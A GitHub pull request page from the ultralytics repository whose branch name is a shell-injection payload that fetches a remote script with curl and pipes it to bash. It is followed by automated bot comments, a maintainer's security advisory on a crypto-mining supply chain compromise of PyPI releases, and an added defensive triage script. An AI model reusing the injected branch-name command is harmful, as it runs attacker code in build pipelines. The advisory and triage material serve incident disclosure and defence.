docs: readme #18018

Closed
openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Conversation

@openimbot openimbot commented Dec 4, 2024

🛠️ PR Summary

Made with ❤️ by Ultralytics Actions

🌟 Summary

This PR doesn't introduce any new code changes.

📊 Key Changes

  • None; the diff shows zero modifications.

🎯 Purpose & Impact

  • This PR might be used for testing, documentation updates, or preparing for future changes, but it has no direct impact on the codebase or users at this time. 🛠️

@UltralyticsAssistant UltralyticsAssistant added the documentation Improvements or additions to documentation label Dec 4, 2024
@UltralyticsAssistant (Member)

👋 Hello @openimbot, thank you for submitting an ultralytics/ultralytics 🚀 PR! To ensure a seamless integration of your work, please review the following checklist:

  • Define a Purpose: Clearly explain the purpose of your fix or feature in your PR description, and link to any relevant issues. Ensure your commit messages are clear, concise, and adhere to the project's conventions.
  • Synchronize with Source: Confirm your PR is synchronized with the ultralytics/ultralytics main branch. If it's behind, update it by clicking the 'Update branch' button or by running git pull and git merge main locally.
  • Ensure CI Checks Pass: Verify all Ultralytics Continuous Integration (CI) checks are passing. If any checks fail, please address the issues.
  • Update Documentation: Ensure your changes align with the project's formatting standards and contribute to the clarity and consistency of the documentation, even for minor updates like this one.
  • Minimize Changes: Since this PR is a documentation update, it's already following the principle of limited, targeted changes—great job! 👏

For more guidance, please refer to our Contributing Guide, and feel free to leave a comment below if you’re unsure about anything.

Thank you for helping improve Ultralytics' documentation! An Ultralytics engineer will review your PR soon. 🚀

@ambitious-octopus ambitious-octopus added the Alert Potential spam, abuse, or off-topic. label Dec 5, 2024
@UltralyticsAssistant UltralyticsAssistant removed the documentation Improvements or additions to documentation label Dec 5, 2024
@CPlusPatch

bro what 💀

@AsherJingkongChen

What did the bot do?

@glenn-jocher (Member)

Security Advisory: Unauthorized Code in PyPI Releases

Summary

Ultralytics has identified a supply chain attack affecting multiple versions of the ultralytics package. The compromised versions contained unauthorized code that downloaded and executed cryptocurrency mining software when instantiating YOLO models. This code was injected into the PyPI release artifacts and was not present in the public GitHub repository.

Technical Details

The unauthorized code performed the following actions:

  1. Detected user system architecture
  2. Downloaded cryptocurrency mining binaries from GitHub blob storage
  3. Executed the mining software as a subprocess

Affected binaries were hosted at:

  • Linux x86: 665bb8add8c21d28a961fe3f93c12b249df10787
  • MacOS arm64: 5e67b0e4375f63eb6892b33b1f98e900802312c2

The malicious process manifested as /tmp/ultralytics_runner and attempted connections to connect.consrensys.com:8080.

Impact

All users who installed and ran affected versions from PyPI were potentially affected. The malicious code was activated upon YOLO model initialization. Source installations from GitHub were not affected.

Affected Versions

  • Compromised PyPI versions: 8.3.41, 8.3.42, 8.3.45, 8.3.46
  • Clean versions: >=8.3.47

Mitigation

  1. Immediately upgrade to version 8.3.47 or later
  2. Check for and terminate any unexpected processes named ultralytics_runner
  3. Remove any suspicious files in the /tmp directory (on Unix-based systems)

Resolution

We have:

  • Removed all affected versions from PyPI
  • Released clean version 8.3.47
  • Secured our PyPI publishing workflow
  • Initiated investigation into our build pipeline
  • Started implementing additional security measures for future releases

Additional Information

This incident appears to be a sophisticated supply chain attack that bypassed PyPI provenance signing. We are conducting a thorough investigation and implementing enhanced security measures to prevent similar incidents.
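A host triage script for the advisory above, added here as an example; it is not part of the original thread or of Ultralytics' own tooling. It assumes the affected version list, the process name and the network endpoint exactly as the advisory states them; SAMPLE_PS is a constructed process listing, not data from a real host.

```python
# Added example (not Ultralytics' own tooling): triage a host against the
# advisory above. Versions and indicators come from the advisory; SAMPLE_PS
# is a constructed process listing, not real data.
from __future__ import annotations

import re
from importlib import metadata

COMPROMISED_VERSIONS = {"8.3.41", "8.3.42", "8.3.45", "8.3.46"}
FIRST_CLEAN_VERSION = (8, 3, 47)          # advisory: clean versions are >=8.3.47
PROCESS_NAME = "ultralytics_runner"       # miner ran as /tmp/ultralytics_runner
C2_ENDPOINT = "connect.consrensys.com:8080"

# Constructed sample `ps -eo pid,args` output used for the demonstration.
SAMPLE_PS = [
    "  101 python -c 'from ultralytics import YOLO'",
    "  142 /tmp/ultralytics_runner",
    "  143 sshd: user [priv]",
]

def parse_version(version: str) -> tuple[int, ...]:
    """'8.3.41' -> (8, 3, 41); trailing non-numeric parts are ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", version)[:3])

def classify_version(version: str) -> str:
    """'compromised', 'clean' (>=8.3.47) or 'upgrade' (older, not listed)."""
    if version in COMPROMISED_VERSIONS:
        return "compromised"
    if parse_version(version) >= FIRST_CLEAN_VERSION:
        return "clean"
    return "upgrade"

def find_indicators(ps_lines: list[str]) -> list[str]:
    """Process-listing lines that match the advisory's indicators."""
    return [ln for ln in ps_lines if PROCESS_NAME in ln or C2_ENDPOINT in ln]

def installed_version() -> str | None:
    """Installed ultralytics version, or None when the package is absent."""
    try:
        return metadata.version("ultralytics")
    except metadata.PackageNotFoundError:
        return None

if __name__ == "__main__":
    v = installed_version()
    print("ultralytics:", f"{v} -> {classify_version(v)}" if v else "not installed")
    for hit in find_indicators(SAMPLE_PS):
        print("indicator hit:", hit)
```

On a real host, replace SAMPLE_PS with the lines of `ps -eo pid,args` and treat any hit as a reason to follow the mitigation steps above.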

@ultralytics ultralytics locked as resolved and limited conversation to collaborators Dec 7, 2024